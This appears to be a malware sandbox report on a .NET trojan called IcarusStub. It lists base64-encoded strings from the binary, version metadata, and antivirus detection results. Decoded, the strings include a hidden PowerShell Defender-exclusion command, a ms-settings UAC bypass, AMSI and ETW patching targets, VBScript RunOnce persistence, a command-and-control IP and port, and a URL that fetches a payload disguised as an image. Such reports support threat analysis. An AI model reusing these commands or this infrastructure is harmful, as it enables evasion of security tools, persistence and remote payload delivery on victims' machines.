c5akFBQU1BQUFBQUVBQ0FBQUNBQUFBK2dFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUExRFFJQUFBQUFBRWdBQUFBQ0FBVUFSTGdBQUFRMkFRQURBQUlBQWdBQUJranVBUUJ3SFFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2NC4wLjMwMzE5XA==
QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2NC4wLjMwMzE5XGN2dHJlcy5leGU=
QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2Mi4wLjUwNzI3XA==
QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2Mi4wLjUwNzI3XGN2dHJlcy5leGU=
VTI5bWRIZGhjbVZjVFdsamNtOXpiMlowWEZkcGJtUnZkM01nVGxSY1EzVnljbVZ1ZEZabGNuTnBiMjVjVjJsdWJHOW5iMjVj
U2hlbGw=
ZXhwbG9yZXIuZXhlLCA=
VTI5bWRIZGhjbVZjVFdsamNtOXpiMlowWEZkcGJtUnZkM01nVGxSY1EzVnljbVZ1ZEZabGNuTnBiMjVjVjJsdWJHOW5iMjQ9
U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVsbFxvcGVuXGNvbW1hbmQ=
cG93ZXJzaGVsbC5leGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLVdpbmRvd1N0eWxlIEhpZGRlbiAtTm9Qcm9maWxlIC1Db21tYW5kIEFkZC1NcFByZWZlcmVuY2UgLUV4Y2x1c2lvblBhdGggJw==
RGVsZWdhdGVFeGVjdXRl
QzpcV2luZG93c1xTeXN0ZW0zMlxDb21wdXRlckRlZmF1bHRzLmV4ZQ==
NS43NS4xNjIuMjIx
RmFsc2U=
ODA4MQ==
SGlkZGVuRXllWl9DbGllbnQ=
bVBneEV4a0xF
JUxPR0Yl
JUhPT0sl
Y3Z0cmVz
aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3BhdGF0YS5qcGc=
XHN2Y2hvc3QuZXhl
XHN2Y2hvc3QuYmF0
REVMICIlfmYwIg==
bnRkbGwuZGxs
RXR3RXZlbnRXcml0ZQ==
YW1zaS5kbGw=
QW1zaVNjYW5CdWZmZXI=
Y21kLmV4ZQ==
dGFza2tpbGwgL0YgL0lNIA==
YXNkZmdoamtscXdlcnR5dWlvcG1uYnZjeHo=
Q2xhc3Nlcw==
Q2xhc3Nlc1xtcy1zZXR0aW5ncw==
Q2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVsbA==
Q2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVsbFxvcGVu
Q2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVsbFxvcGVuXGNvbW1hbmQ=
L2Mgc3RhcnQgY29tcHV0ZXJkZWZhdWx0cy5leGU=
bG9jYWxhcHBkYXRh
XEV4ZWN1dGlvbi52YnM=
b24gZXJyb3IgcmVzdW1lIG5leHQNCnNldCB3c2hTaGVsbCA9IENyZWF0ZU9iamVjdCggIldTY3JpcHQuU2hlbGwiICkNCndzaFNoZWxsLlJlZ1dyaXRlICJIS0NVXFNvZnR3YXJlXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFJ1bk9uY2Vc
IiwgIg==
Ig0Kc2V0IGZpbGVzeXMgPSBDcmVhdGVPYmplY3QoIlNjcmlwdGluZy5GaWxlU3lzdGVtT2JqZWN0IikNCmZpbGVzeXMuQ29weUZpbGUi
Ig0KSGlkZGVuU3RhcnRmaWxlc3lzLkRlbGV0ZUZpbGUgV1NjcmlwdC5TY3JpcHRGdWxsTmFtZQ==
ZXhwbG9yZXIuZXhl
U29mdHdhcmVc
YUhSMGNITTZMeTl5WVhjdVoybDBhSFZpZFhObGNtTnZiblJsYm5RdVkyOXRMMGhwWkdSbGJrVjVaVm92ZEdjdmJXRnBiaTl5ZEM1cWNHYz0=
ezB9eHsxfQ==
U2VsZWN0ICogRnJvbSBXaW4zMl9Qcm9jZXNzIFdoZXJlIFBhcmVudFByb2Nlc3NJRD0=
UHJvY2Vzc0lE
U29mdHdhcmVcXDM2MFxcMzYwc2U2XFxDaHJvbWU=
dXNlcl9kYXRhX2Rpcg==
MzYwc2U=
RGVmYXVsdA==
SWNhcnVzU3R1Yi5Qcm9wZXJ0aWVzLlJlc291cmNlcw==
U3RyaW5nMQ==
asdfghjklqwertyuiopmnbvcxz
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
IcarusStub
FileVersion
1.0.0.9
InternalName
net2.exe
LegalCopyright
Copyright
2022
LegalTrademarks
OriginalFilename
net2.exe
ProductName
IcarusStub
ProductVersion
1.0.0.9
Assembly Version
1.0.0.9
Antivirus Signature
Bkav W32.AIDetectNet.01
Lionic Trojan.Win32.Generic.4!c
Elastic malicious (high confidence)
DrWeb Trojan.PackedNET.335
MicroWorld-eScan IL:Trojan.MSILZilla.11609
ClamAV Clean
FireEye Generic.mg.4c9bc0e73872ba91
CAT-QuickHeal Clean
McAfee Artemis!4C9BC0E73872
Cylance unsafe
VIPRE IL:Trojan.MSILZilla.11609
Sangfor Trojan.Win32.Save.a
K7AntiVirus Clean
BitDefender IL:Trojan.MSILZilla.11609
K7GW Clean
CrowdStrike win/malicious_confidence_100% (W)
BitDefenderTheta AI:Packer.DEFC9D481F
VirIT Clean
Cyren W32/MSIL_Troj.C.gen!Eldorado
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of MSIL/GenKryptik.FYPC
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan.Win32.Generic
Alibaba TrojanSpy:MSIL/KeyLogger.b483f5fb
NANO-Antivirus Clean
ViRobot Clean
Rising Malware.Obfus/MSIL@AI.100 (RDM.MSIL2:4SVdAeSJP3XDeu0MKZosRg)
Sophos Mal/Generic-S
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition GenericRXVL-IO!4C9BC0E73872
Trapmine suspicious.low.ml.score
CMC Clean
Emsisoft IL:Trojan.MSILZilla.11609 (B)
SentinelOne Static AI - Malicious PE
GData IL:Trojan.MSILZilla.11609
Jiangmin Clean
Webroot Clean
Avira Clean
MAX malware (ai score=84)
Antiy-AVL Clean
Gridinsoft Malware.Win32.Gen.bot
Xcitium Clean
Arcabit IL:Trojan.MSILZilla.D2D59
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Win32.Generic
Microsoft TrojanSpy:MSIL/KeyLogger.SRP!MTB
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5367154
Acronis suspicious
VBA32 Clean
ALYac IL:Trojan.MSILZilla.11609
TACHYON Clean
DeepInstinct MALICIOUS
Malwarebytes Crypt.Trojan.MSIL.DDS
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Win32.Trojan.Generic.Osmw
Yandex Clean
Ikarus Trojan-Spy.Agent
MaxSecure Trojan.Malware.121218.susgen
Fortinet Clean
AVG MSIL:Agent-FI [Trj]
Avast MSIL:Agent-FI [Trj]
No IRMA results available.